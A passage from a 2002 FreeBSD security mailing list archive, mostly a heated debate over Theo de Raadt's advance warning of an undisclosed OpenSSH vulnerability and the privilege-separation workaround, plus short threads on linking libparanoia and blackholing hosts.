detection of the rule. If they > are listed in the file, deny them with ipfw. > > Is this more up your alley? > Yeah, it sounds like what I'm after, but based on the number of questions that asked "what exactly do you want to do?", I've been convinced that I'm over-complicating the situation, and simply blackholing what I've got listed in my /etc/hosts.deny should be enough. Klaus To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jun 24 17:53:22 2002 Delivered-To: freebsd-security@freebsd.org Received: from gw.nectar.cc (gw.nectar.cc [208.42.49.153]) by hub.freebsd.org (Postfix) with ESMTP id 353E037B401 for ; Mon, 24 Jun 2002 17:53:19 -0700 (PDT) Received: from madman.nectar.cc (madman.nectar.cc [10.0.1.111]) by gw.nectar.cc (Postfix) with ESMTP id C12BD3A; Mon, 24 Jun 2002 19:53:18 -0500 (CDT) Received: from madman.nectar.cc (localhost [IPv6:::1]) by madman.nectar.cc (8.12.3/8.12.3) with ESMTP id g5P0rIiD043445; Mon, 24 Jun 2002 19:53:18 -0500 (CDT) (envelope-from nectar@madman.nectar.cc) Received: (from nectar@localhost) by madman.nectar.cc (8.12.3/8.12.3/Submit) id g5P0rIqT043444; Mon, 24 Jun 2002 19:53:18 -0500 (CDT) Date: Mon, 24 Jun 2002 19:53:18 -0500 From: "Jacques A. Vidrine" To: Theo de Raadt Cc: freebsd-security@FreeBSD.ORG Subject: Re: Hogwash Message-ID: <20020625005318.GB43386@madman.nectar.cc> Mail-Followup-To: "Jacques A. Vidrine" , Theo de Raadt , freebsd-security@FreeBSD.ORG References: <200206242327.g5ONRBLI012690@cvs.openbsd.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <200206242327.g5ONRBLI012690@cvs.openbsd.org> User-Agent: Mutt/1.4i X-Url: http://www.nectar.cc/ Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Mon, Jun 24, 2002 at 05:27:11PM -0600, Theo de Raadt wrote: > > Nobody is `in' on the bug. The OpenSSH team has given details to no > > one so far, so we are assured to be blindsided. I'm afraid security > > contacts with various projects and vendors know no more than what was > > said in the bugtraq posting. > > Bullshit. You are reacting to my `blindsided' comment. The rest is factual, AFAIK, and your comments below seem to underline that. > You have been told to move up to privsep so that you are immunized by > the time the bug is released. > > If you fail to immunize your users, then the best you can do is tell > them to disable OpenSSH until 3.4 is out early next week with the > bugfix in it. Of course, then the bug will be public. > > I am not nearly naive enough to believe that we can release a patch > for this issue to any vendor, and have it not leak immediately. Still, we'll all be much more at ease once all the cards are on the table. I appreciate that you are trying to prepare users, but forgive me if I don't agree that witholding the details is the best approach. Cheers, -- Jacques A. Vidrine http://www.nectar.cc/ NTT/Verio SME . FreeBSD UNIX . Heimdal Kerberos jvidrine@verio.net . nectar@FreeBSD.org . nectar@kth.se To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jun 24 17:58: 3 2002 Delivered-To: freebsd-security@freebsd.org Received: from cvs.openbsd.org (cvs.openbsd.org [199.185.137.3]) by hub.freebsd.org (Postfix) with ESMTP id BBD4937B403; Mon, 24 Jun 2002 17:57:59 -0700 (PDT) Received: from cvs.openbsd.org (deraadt@localhost [127.0.0.1]) by cvs.openbsd.org (8.12.4/8.12.1) with ESMTP id g5P0wgLJ021374; Mon, 24 Jun 2002 18:58:42 -0600 (MDT) Message-Id: <200206250058.g5P0wgLJ021374@cvs.openbsd.org> To: "Jacques A. Vidrine" Cc: freebsd-security@FreeBSD.ORG Subject: Re: Hogwash In-reply-to: Your message of "Mon, 24 Jun 2002 19:53:18 CDT." <20020625005318.GB43386@madman.nectar.cc> Date: Mon, 24 Jun 2002 18:58:42 -0600 From: Theo de Raadt Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org > Still, we'll all be much more at ease once all the cards are on the > table. I appreciate that you are trying to prepare users, but forgive > me if I don't agree that witholding the details is the best approach. So please, humour me. Who precisely should I be telling this information to, who isn't going to leak it, ship patches to their customers early, etc. Who? To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jun 24 18: 6:48 2002 Delivered-To: freebsd-security@freebsd.org Received: from gw.nectar.cc (gw.nectar.cc [208.42.49.153]) by hub.freebsd.org (Postfix) with ESMTP id 2A20837B400 for ; Mon, 24 Jun 2002 18:06:44 -0700 (PDT) Received: from madman.nectar.cc (madman.nectar.cc [10.0.1.111]) by gw.nectar.cc (Postfix) with ESMTP id A5E943A; Mon, 24 Jun 2002 20:06:43 -0500 (CDT) Received: from madman.nectar.cc (localhost [IPv6:::1]) by madman.nectar.cc (8.12.3/8.12.3) with ESMTP id g5P16hiD043502; Mon, 24 Jun 2002 20:06:43 -0500 (CDT) (envelope-from nectar@madman.nectar.cc) Received: (from nectar@localhost) by madman.nectar.cc (8.12.3/8.12.3/Submit) id g5P16hnA043501; Mon, 24 Jun 2002 20:06:43 -0500 (CDT) Date: Mon, 24 Jun 2002 20:06:43 -0500 From: "Jacques A. Vidrine" To: Theo de Raadt Cc: freebsd-security@FreeBSD.ORG Subject: Re: Hogwash Message-ID: <20020625010643.GC43386@madman.nectar.cc> Mail-Followup-To: "Jacques A. Vidrine" , Theo de Raadt , freebsd-security@FreeBSD.ORG References: <20020625005318.GB43386@madman.nectar.cc> <200206250058.g5P0wgLJ021374@cvs.openbsd.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <200206250058.g5P0wgLJ021374@cvs.openbsd.org> User-Agent: Mutt/1.4i X-Url: http://www.nectar.cc/ Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Mon, Jun 24, 2002 at 06:58:42PM -0600, Theo de Raadt wrote: > > Still, we'll all be much more at ease once all the cards are on the > > table. I appreciate that you are trying to prepare users, but forgive > > me if I don't agree that witholding the details is the best approach. > > So please, humour me. Who precisely should I be telling this > information to, who isn't going to leak it, ship patches to their > customers early, etc. > > Who? Your favorite pet? :-) And then muzzle it. I don't disagree that leaks happen. That's Just the Way It Is. I'd rather we had the information now to make wise choices about what to do with deployed systems, custom hacks, and older-but-still-supported releases --- knowing there is a possibility for `leakage' that grows with time. As it is, we'll just have to wait until... what... Thursday? Cheers, -- Jacques A. Vidrine http://www.nectar.cc/ NTT/Verio SME . FreeBSD UNIX . Heimdal Kerberos jvidrine@verio.net . nectar@FreeBSD.org . nectar@kth.se To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jun 24 18:10:54 2002 Delivered-To: freebsd-security@freebsd.org Received: from cvs.openbsd.org (cvs.openbsd.org [199.185.137.3]) by hub.freebsd.org (Postfix) with ESMTP id A3DF837B400; Mon, 24 Jun 2002 18:10:48 -0700 (PDT) Received: from cvs.openbsd.org (deraadt@localhost [127.0.0.1]) by cvs.openbsd.org (8.12.4/8.12.1) with ESMTP id g5P1BVLJ015666; Mon, 24 Jun 2002 19:11:31 -0600 (MDT) Message-Id: <200206250111.g5P1BVLJ015666@cvs.openbsd.org> To: "Jacques A. Vidrine" Cc: freebsd-security@FreeBSD.ORG Subject: Re: Hogwash In-reply-to: Your message of "Mon, 24 Jun 2002 20:06:43 CDT." <20020625010643.GC43386@madman.nectar.cc> Date: Mon, 24 Jun 2002 19:11:30 -0600 From: Theo de Raadt Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org > I don't disagree that leaks happen. That's Just the Way It Is. Not this time. > I'd > rather we had the information now to make wise choices about what to > do with deployed systems, custom hacks, and older-but-still-supported > releases --- knowing there is a possibility for `leakage' that grows > with time. Ask your vendor. And ask them to read the following (which I am re-posting since people appear not to have read it carefully enough), where I lay out very very very clearly what your choices and your vendor's choices are. If you don't like those choices, turn it off. What more do you expect? Ice cream and a pat on the head? You've never had it better! You get a warning days and days in advance, with no leak, and you shoot the messenger! Bang! As I said: Hogwash. --- To: bugtraq@securityfocus.com cc: dsi@iss.net cc: announce@openbsd.org cc: misc@openbsd.org Subject: Upcoming OpenSSH vulnerability Date: Mon, 24 Jun 2002 15:00:10 -0600 From: Theo de Raadt There is an upcoming OpenSSH vulnerability that we're working on with ISS. Details will be published early next week. However, I can say that when OpenSSH's sshd(8) is running with priv seperation, the bug cannot be exploited. OpenSSH 3.3p was released a few days ago, with various improvements but in particular, it significantly improves the Linux and Solaris support for priv sep. However, it is not yet perfect. Compression is disabled on some systems, and the many varieties of PAM are causing major headaches. However, everyone should update to OpenSSH 3.3 immediately, and enable priv seperation in their ssh daemons, by setting this in your /etc/ssh/sshd_config file: UsePrivilegeSeparation yes Depending on what your system is, privsep may break some ssh functionality. However, with privsep turned on, you are immune from at least one remote hole. Understand? 3.3 does not contain a fix for this upcoming bug. If priv seperation does not work on your operating system, you need to work with your vendor so that we get patches to make it work on your system. Our developers are swamped enough without trying to support the myriad of PAM and other issues which exist in various systems. You must call on your vendors to help us. Basically, OpenSSH sshd(8) is something like 27000 lines of code. A lot of that runs as root. But when UsePrivilegeSeparation is enabled, the daemon splits into two parts. A part containing about 2500 lines of code remains as root, and the rest of the code is shoved into a chroot-jail without any privs. This makes the daemon less vulnerable to attack. We've been trying to warn vendors about 3.3 and the need for privsep, but they really have not heeded our call for assistance. They have basically ignored us. Some, like Alan Cox, even went further stating that privsep was not being worked on because "Nobody provided any info which proves the problem, and many people dont trust you theo" and suggested I "might be feeding everyone a trojan" (I think I'll publish that letter -- it is just so funny). HP's representative was downright rude, but that is OK because Compaq is retiring him. Except for Solar Designer, I think none of them has helped the OpenSSH portable developers make privsep work better on their systems. Apparently Solar Designer is the only person who understands the need for this stuff. So, if vendors would JUMP and get it working better, and send us patches IMMEDIATELY, we can perhaps make a 3.3.1p release on Friday which supports these systems better. So send patches by Thursday night please. Then on Tuesday or Wednesday the complete bug report with patches (and exploits soon after I am sure) will hit BUGTRAQ. Let me repeat: even if the bug exists in a privsep'd sshd, it is not exploitable. Clearly we cannot yet publish what the bug is, or provide anyone with the real patch, but we can try to get maximum deployement of privsep, and therefore make it hurt less when the problem is published. So please push your vendor to get us maximally working privsep patches as soon as possible! We've given most vendors since Friday last week until Thursday to get privsep working well for you so that when the announcement comes out next week their customers are immunized. That is nearly a full week (but they have already wasted a weekend and a Monday). Really I think this is the best we can hope to do (this thing will eventually leak, at which point the details will be published). Customers can judge their vendors by how they respond to this issue. OpenBSD and NetBSD users should also update to OpenSSH 3.3 right away. On OpenBSD privsep works flawlessly, and I have reports that is also true on NetBSD. All other systems appear to have minor or major weaknesses when this code is running. (securityfocus postmaster; please post this through immediately, since i have bcc'd over 30 other places..) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jun 24 18:24:44 2002 Delivered-To: freebsd-security@freebsd.org Received: from topperwein.dyndns.org (acs-24-154-28-203.zoominternet.net [24.154.28.203]) by hub.freebsd.org (Postfix) with ESMTP id 24F1337B406 for ; Mon, 24 Jun 2002 18:24:35 -0700 (PDT) Received: from topperwein (topperwein [192.168.168.10]) by topperwein.dyndns.org (8.12.3/8.12.3) with ESMTP id g5P1OTLq007352 for ; Mon, 24 Jun 2002 21:24:29 -0400 (EDT) (envelope-from behanna@zbzoom.net) Date: Mon, 24 Jun 2002 21:24:24 -0400 (EDT) From: Chris BeHanna Reply-To: Chris BeHanna To: FreeBSD Security Subject: RE: libparanoia In-Reply-To: <2600.192.168.1.4.1024945572.squirrel@webmail.probsd.ws> Message-ID: <20020624211941.K7245-100000@topperwein.dyndns.org> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Mon, 24 Jun 2002, Michael Sharp wrote: > So, if I install libparanoia.. I would then add to any Makefile's CFLAGS > arguments -lparanoia -L/usr/local/lib ? That looks backwards. "-L/usr/local/lib -lparanoia" looks more sensible. > Example: /usr/ports/www/apache13/Makefile > > change: CFLAGS+= -O6 -fomit-frame-pointer > > to: CFLAGS+= -O6 -fomit-frame-pointer -lparanoia -L/usr/local/lib > > and apache13 would be built using /usr/local/lib/libparanoia.so ? No. You want to alter LDFLAGS, not CFLAGS. At some point in the not-too-distant past (i.e., around the time of the publication of the zlib double-free bug), the merits and caveats of using libparanoia were discussed. I suggest you search the list archives. -- Chris BeHanna Software Engineer (Remove "bogus" before responding.) behanna@bogus.zbzoom.net Turning coffee into software since 1990. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jun 24 18:31: 5 2002 Delivered-To: freebsd-security@freebsd.org Received: from probsd.ws (ilm26-7-034.ec.rr.com [66.26.7.34]) by hub.freebsd.org (Postfix) with ESMTP id EA2D837B401 for ; Mon, 24 Jun 2002 18:30:58 -0700 (PDT) Received: from probsd.ws (probsd.ws [192.168.1.4]) by probsd.ws (8.12.4/8.12.4) with SMTP id g5P1WcGu000264; Mon, 24 Jun 2002 21:32:38 -0400 (EDT) (envelope-from freebsd@ec.rr.com) Message-ID: <2002.66.56.232.240.1024968758.squirrel@webmail.probsd.ws> Date: Mon, 24 Jun 2002 21:32:38 -0400 (EDT) Subject: RE: libparanoia From: "Michael Sharp" To: In-Reply-To: <20020624211941.K7245-100000@topperwein.dyndns.org> References: <2600.192.168.1.4.1024945572.squirrel@webmail.probsd.ws> <20020624211941.K7245-100000@topperwein.dyndns.org> X-Priority: 3 Importance: Normal X-MSMail-Priority: Normal Cc: X-Mailer: SquirrelMail (version 1.2.7) MIME-Version: 1.0 Content-Type: text/plain; charset=iso-8859-1 Content-Transfer-Encoding: 8bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Thx Chris, yea, I see now that it is backwards, but thats how the author had it documented. I'll compile apache now with the LDFLAGS argument and run ldd `which httpd` to see if it build libparanoia in. If not, I guess I could use apxs to install the libparanoia object file. Again, thx michael Chris BeHanna said: > On Mon, 24 Jun 2002, Michael Sharp wrote: > >> So, if I install libparanoia.. I would then add to any Makefile's >> CFLAGS arguments -lparanoia -L/usr/local/lib ? > > That looks backwards. "-L/usr/local/lib -lparanoia" looks more > sensible. > >> Example: /usr/ports/www/apache13/Makefile >> >> change: CFLAGS+= -O6 -fomit-frame-pointer >> >> to: CFLAGS+= -O6 -fomit-frame-pointer -lparanoia >> -L/usr/local/lib >> >> and apache13 would be built using /usr/local/lib/libparanoia.so ? > > No. You want to alter LDFLAGS, not CFLAGS. > > At some point in the not-too-distant past (i.e., around the time > of the publication of the zlib double-free bug), the merits and > caveats of using libparanoia were discussed. I suggest you search the > list archives. > > -- > Chris BeHanna > Software Engineer (Remove "bogus" before responding.) > behanna@bogus.zbzoom.net > Turning coffee into software since 1990. > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jun 24 18:33:18 2002 Delivered-To: freebsd-security@freebsd.org Received: from blues.jpj.net (blues.jpj.net [208.210.80.156]) by hub.freebsd.org (Postfix) with ESMTP id A5FD537B401; Mon, 24 Jun 2002 18:33:12 -0700 (PDT) Received: from blues.jpj.net (localhost.jpj.net [127.0.0.1]) by blues.jpj.net (8.12.3/8.12.3) with ESMTP id g5P1WrOa019236; Mon, 24 Jun 2002 21:32:53 -0400 (EDT) (envelope-from trevor@jpj.net) Received: from localhost (trevor@localhost) by blues.jpj.net (8.12.3/8.12.3/Submit) with ESMTP id g5P1WrQw019233; Mon, 24 Jun 2002 21:32:53 -0400 (EDT) X-Authentication-Warning: blues.jpj.net: trevor owned process doing -bs Date: Mon, 24 Jun 2002 21:32:53 -0400 (EDT) From: Trevor Johnson To: Theo de Raadt Cc: "Jacques A. Vidrine" , Subject: Re: Hogwash In-Reply-To: <200206250111.g5P1BVLJ015666@cvs.openbsd.org> Message-ID: <20020624212639.Q17664-100000@blues.jpj.net> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Theo de Raadt wrote: > There is an upcoming OpenSSH vulnerability that we're working on with > ISS. Details will be published early next week. > > However, I can say that when OpenSSH's sshd(8) is running with priv > seperation, the bug cannot be exploited. Have other SECSH servers--lsh, FreSSH, SSH Communications'--been tested? If so, were there any which failed to be vulnerable? -- Trevor Johnson To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jun 24 18:35:33 2002 Delivered-To: freebsd-security@freebsd.org Received: from topperwein.dyndns.org (acs-24-154-28-203.zoominternet.net [24.154.28.203]) by hub.freebsd.org (Postfix) with ESMTP id 2F10637B409 for ; Mon, 24 Jun 2002 18:35:28 -0700 (PDT) Received: from topperwein (topperwein [192.168.168.10]) by topperwein.dyndns.org (8.12.3/8.12.3) with ESMTP id g5P1ZBLq007407; Mon, 24 Jun 2002 21:35:11 -0400 (EDT) (envelope-from behanna@zbzoom.net) Date: Mon, 24 Jun 2002 21:35:06 -0400 (EDT) From: Chris BeHanna Reply-To: Chris BeHanna To: FreeBSD Security Cc: deraadt@cvs.openbsd.org Subject: Re: [openssh-unix-announce] Re: Upcoming OpenSSH vulnerability (fwd) In-Reply-To: <20020624163538.H10398-100000@yez.hyperreal.org> Message-ID: <20020624212557.R7245-100000@topperwein.dyndns.org> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Although I sympathize with the desire to be able to make informed decisions regarding older versions of supported software that's in the field, I have to say that I side with Theo here: We're being warned that a critical exploit will be published in a few days, along with the simultaneous release of a version of the software that fixes the bug that leads to the exploit, AND we're being told how to immunize ourselves against the exploit--using currently-available software--several days in advance of the announcement. Result: it's possible to completely prevent the window of vulnerability that usually exists between the announcement of an exploit and the availability of a fix for same. Any other way *guarantees* that there will be a leak prior to the bugfix release, causing more than a few folks to get burned by the exploit before they get a chance to read their mail and learn how to enable the workaround. In a perfect world, Theo could publicize the exploit without fear of it being used to burn people prior to their learning how to use the workaround. But in a perfect world, we wouldn't need OpenSSH. Thank you, Theo. -- Chris BeHanna Software Engineer (Remove "bogus" before responding.) behanna@bogus.zbzoom.net Turning coffee into software since 1990. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jun 24 18:38:34 2002 Delivered-To: freebsd-security@freebsd.org Received: from lariat.org (lariat.org [63.229.157.2]) by hub.freebsd.org (Postfix) with ESMTP id 8A06A37B403 for ; Mon, 24 Jun 2002 18:38:30 -0700 (PDT) Received: (from brett@localhost) by lariat.org (8.9.3/8.9.3) id TAA10792; Mon, 24 Jun 2002 19:38:21 -0600 (MDT) Date: Mon, 24 Jun 2002 19:38:21 -0600 (MDT) From: Brett Glass Message-Id: <200206250138.TAA10792@lariat.org> To: freebsd-security@FreeBSD.ORG, klaus@compt.com Subject: Re: automated blackholing In-Reply-To: <20020624183614.J589@cthulu.compt.com> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org See the SNOBOL4 program at http://www.brettglass.com/logmonitors/. It demonstrates how to react to a log message by blackholing the machine that attempted to connect. --Brett To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jun 24 18:40:32 2002 Delivered-To: freebsd-security@freebsd.org Received: from caligula.anu.edu.au (caligula.anu.edu.au [150.203.224.42]) by hub.freebsd.org (Postfix) with ESMTP id 0635A37B401; Mon, 24 Jun 2002 18:40:20 -0700 (PDT) Received: (from avalon@localhost) by caligula.anu.edu.au (8.9.3/8.9.3) id LAA26616; Tue, 25 Jun 2002 11:40:15 +1000 (EST) From: Darren Reed Message-Id: <200206250140.LAA26616@caligula.anu.edu.au> Subject: Re: Hogwash To: deraadt@cvs.openbsd.org (Theo de Raadt) Date: Tue, 25 Jun 2002 11:40:15 +1000 (Australia/ACT) Cc: nectar@FreeBSD.ORG (Jacques A. Vidrine), freebsd-security@FreeBSD.ORG In-Reply-To: <200206250111.g5P1BVLJ015666@cvs.openbsd.org> from "Theo de Raadt" at Jun 24, 2002 07:11:30 PM X-Mailer: ELM [version 2.5 PL1] MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org In some mail from Theo de Raadt, sie said: > > > I don't disagree that leaks happen. That's Just the Way It Is. > > Not this time. > > > I'd > > rather we had the information now to make wise choices about what to > > do with deployed systems, custom hacks, and older-but-still-supported > > releases --- knowing there is a possibility for `leakage' that grows > > with time. > > Ask your vendor. And ask them to read the following (which I am > re-posting since people appear not to have read it carefully enough), > where I lay out very very very clearly what your choices and your > vendor's choices are. If you don't like those choices, turn it off. > What more do you expect? Ice cream and a pat on the head? You've > never had it better! You get a warning days and days in advance, with > no leak, and you shoot the messenger! Bang! As I said: Hogwash. What I like least about this new bug is that the workaround is to use a new feature called "Priviledge Separation". Maybe it wouldn't have mattered what the "next new bug" was, this would just have been one defence. The timing is quite ironic. The paranoia in me is screaming to resist and I can't help but ponder, does enabling priviledge separation disable the exploit or does it just limit it to the userid sshd runs as in this mode ? Can an attacker still get a remote shell (just not root) if priviledge separation is enabled ? Darren To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jun 24 18:45:59 2002 Delivered-To: freebsd-security@freebsd.org Received: from cvs.openbsd.org (cvs.openbsd.org [199.185.137.3]) by hub.freebsd.org (Postfix) with ESMTP id C64A037B401; Mon, 24 Jun 2002 18:45:54 -0700 (PDT) Received: from cvs.openbsd.org (deraadt@localhost [127.0.0.1]) by cvs.openbsd.org (8.12.4/8.12.1) with ESMTP id g5P1kXLI030924; Mon, 24 Jun 2002 19:46:33 -0600 (MDT) Message-Id: <200206250146.g5P1kXLI030924@cvs.openbsd.org> To: Darren Reed Cc: nectar@FreeBSD.ORG (Jacques A. Vidrine), freebsd-security@FreeBSD.ORG Subject: Re: Hogwash In-reply-to: Your message of "Tue, 25 Jun 2002 11:40:15 +1000." <200206250140.LAA26616@caligula.anu.edu.au> Date: Mon, 24 Jun 2002 19:46:33 -0600 From: Theo de Raadt Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org > What I like least about this new bug is that the workaround is to use > a new feature called "Priviledge Separation". Maybe it wouldn't have > mattered what the "next new bug" was, this would just have been one > defence. The timing is quite ironic. Yes, and you know all about ironic timing > The paranoia in me is screaming to resist and I can't help but ponder, > does enabling priviledge separation disable the exploit or does it just > limit it to the userid sshd runs as in this mode ? Darren, resist enabling privsep. I cannot find strong enough enough words in urging you. > Can an attacker still get a remote shell (just not root) if priviledge > separation is enabled ? Duh. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jun 24 18:50:34 2002 Delivered-To: freebsd-security@freebsd.org Received: from walter.dfmm.org (walter.dfmm.org [209.151.233.240]) by hub.freebsd.org (Postfix) with ESMTP id C9D8F37B401 for ; Mon, 24 Jun 2002 18:50:28 -0700 (PDT) Received: (qmail 2968 invoked by uid 1000); 25 Jun 2002 01:50:23 -0000 Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 25 Jun 2002 01:50:23 -0000 Date: Mon, 24 Jun 2002 18:50:23 -0700 (PDT) From: Jason Stone X-X-Sender: To: FreeBSD Security Cc: Subject: Re: [openssh-unix-announce] Re: Upcoming OpenSSH vulnerability (fwd) In-Reply-To: <20020624212557.R7245-100000@topperwein.dyndns.org> Message-ID: <20020624183837.P40482-100000@walter> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 > Although I sympathize with the desire to be able to make informed > decisions regarding older versions of supported software that's in the > field, I have to say that I side with Theo here: We're being warned that > a critical exploit will be published in a few days, along with the > simultaneous release of a version of the software that fixes the bug > that leads to the exploit, AND we're being told how to immunize > ourselves against the exploit--using currently-available > software--several days in advance of the announcement. 1) The problem for us is that we're still using openssh-2.x in -STABLE, so privelege separation isn't an really an option. 2) Privelege separaration, while a great idea, is not the same as there being no bug - there is still an exploitable bug in the openssh code. And it seems to me that much time is being wasted pointing fingers about why vendors aren't helping with privelege separation; stop complaining about vendors and fix the bugs in your code. 3) If the openssh team has discovered the bug, the black hats have already discovered it as well. Delaying publication only gives the blackhats notice that they'd better hack as many systems as they can before the fix comes out. Release now and let the community help you fix the bug (since apparently it's so complicated that you can't fix it right away on your own...). -Jason ----------------------------------------------------------------------- I worry about my child and the Internet all the time, even though she's too young to have logged on yet. Here's what I worry about. I worry that 10 or 15 years from now, she will come to me and say "Daddy, where were you when they took freedom of the press away from the Internet?" -- Mike Godwin -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (FreeBSD) Comment: See https://private.idealab.com/public/jason/jason.gpg iD8DBQE9F8xfswXMWWtptckRAiVUAJ9UlKcwpvWhciUgw0jta7R/IXnFkQCgmNqQ 7JlLP+gHMHcfDDX2KI4oJjk= =Q8o7 -----END PGP SIGNATURE----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jun 24 18:56:15 2002 Delivered-To: freebsd-security@freebsd.org Received: from cvs.openbsd.org (cvs.openbsd.org [199.185.137.3]) by hub.freebsd.org (Postfix) with ESMTP id 27F0337B400 for ; Mon, 24 Jun 2002 18:56:09 -0700 (PDT) Received: from cvs.openbsd.org (deraadt@localhost [127.0.0.1]) by cvs.openbsd.org (8.12.4/8.12.1) with ESMTP id g5P1upLJ029822; Mon, 24 Jun 2002 19:56:51 -0600 (MDT) Message-Id: <200206250156.g5P1upLJ029822@cvs.openbsd.org> To: Jason Stone Cc: FreeBSD Security Subject: Re: [openssh-unix-announce] Re: Upcoming OpenSSH vulnerability (fwd) In-reply-to: Your message of "Mon, 24 Jun 2002 18:50:23 PDT." <20020624183837.P40482-100000@walter> Date: Mon, 24 Jun 2002 19:56:51 -0600 From: Theo de Raadt Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org > > Although I sympathize with the desire to be able to make informed > > decisions regarding older versions of supported software that's in the > > field, I have to say that I side with Theo here: We're being warned that > > a critical exploit will be published in a few days, along with the > > simultaneous release of a version of the software that fixes the bug > > that leads to the exploit, AND we're being told how to immunize > > ourselves against the exploit--using currently-available > > software--several days in advance of the announcement. You are misinformed; the sky is not pink. > 1) The problem for us is that we're still using openssh-2.x in -STABLE, so > privelege separation isn't an really an option. Fine. Then turn sshd off. > 2) Privelege separaration, while a great idea, is not the same as there > being no bug - there is still an exploitable bug in the openssh code. Fine. So turn sshd off. > And it seems to me that much time is being wasted pointing fingers about > why vendors aren't helping with privelege separation; stop complaining > about vendors and fix the bugs in your code. Jason is begging that I release a patch tomorrow. What do you the rest of you think? Do you wish to be immunized first or should we just post a patch, and have a public exploit a day later? > 3) If the openssh team has discovered the bug, the black hats have already > discovered it as well. Maybe they have, maybe they have not. But it isn't published yet. > Delaying publication only gives the blackhats > notice that they'd better hack as many systems as they can before the fix > comes out. If they have it. Sure, fine. Blackhats -- shalott.net is a good target. > Release now and let the community help you fix the bug (since > apparently it's so complicated that you can't fix it right away on your > own...). It took about 3 minutes for the first rev. Apparently you have a comprehension difficulty. I urge you to go back and re-read what I posted to lots of lists. Perhaps some other people can help you. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jun 24 19: 0:24 2002 Delivered-To: freebsd-security@freebsd.org Received: from gray.impulse.net (gray.impulse.net [207.154.64.174]) by hub.freebsd.org (Postfix) with ESMTP id 9A55237B401; Mon, 24 Jun 2002 19:00:14 -0700 (PDT) Received: by gray.impulse.net (Postfix, from userid 1000) id 3111237607; Mon, 24 Jun 2002 19:00:13 -0700 (PDT) To: Theo de Raadt Cc: "Jacques A. 